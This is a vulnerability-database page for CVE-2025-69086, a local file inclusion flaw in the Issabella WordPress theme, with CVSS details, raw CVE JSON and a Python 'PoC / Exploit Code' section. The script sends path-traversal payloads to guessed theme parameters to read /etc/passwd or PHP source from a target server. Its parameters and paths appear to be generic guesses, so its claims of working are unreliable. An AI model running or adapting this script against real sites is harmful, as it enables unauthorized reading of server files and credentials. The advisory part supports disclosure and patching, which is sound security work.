Security Vulnerability Report
中文
CVE-2025-69086 CVSS 8.1 HIGH

CVE-2025-69086

Published: 2026-01-06 17:15:46
Last Modified: 2026-04-23 15:36:20

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jwsthemes Issabella issabella allows PHP Local File Inclusion.This issue affects Issabella: from n/a through <= 1.1.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Issabella Theme <= 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69086 PoC - Issabella Theme LFI # Target: WordPress site with Issabella theme <= 1.1.2 def exploit_lfi(target_url, filename='/etc/passwd'): """ Exploit Local File Inclusion vulnerability in Issabella theme Args: target_url: Base URL of the vulnerable WordPress site filename: File path to read on the target server Returns: Content of the requested file """ # Common vulnerable parameters in Issabella theme vulnerable_params = ['file', 'page', 'template', 'theme', 'load', 'include'] for param in vulnerable_params: # Try different path traversal patterns payloads = [ f"{filename}", f"../../../{filename}", f"../../../../{filename}", f"../../../../../{filename}" ] for payload in payloads: try: # Test common theme file inclusion paths paths = [ f"/wp-content/themes/issabella/{payload}", f"/wp-content/themes/issabella/functions.php?file={payload}", f"/wp-content/themes/issabella/inc/{payload}" ] for path in paths: params = {param: path} response = requests.get(target_url, params=params, timeout=10, verify=False) if response.status_code == 200: # Check if file content is returned if 'root:' in response.text or '<?php' in response.text: print(f"[+] Vulnerable! Parameter: {param}") print(f"[+] Payload: {payload}") print(f"[+] File content:") print(response.text[:1000]) return response.text except requests.RequestException as e: print(f"[-] Request error: {e}") print("[-] No vulnerability found or file not accessible") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-69086.py <target_url> [filename]") print("Example: python cve-2025-69086.py http://target.com /etc/passwd") sys.exit(1) target = sys.argv[1] file_to_read = sys.argv[2] if len(sys.argv) > 2 else '/etc/passwd' print(f"[*] Testing CVE-2025-69086 on {target}") print(f"[*] Attempting to read: {file_to_read}") exploit_lfi(target, file_to_read)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69086", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:45.557", "lastModified": "2026-04-23T15:36:20.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jwsthemes Issabella issabella allows PHP Local File Inclusion.This issue affects Issabella: from n/a through <= 1.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/issabella/vulnerability/wordpress-issabella-theme-1-1-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}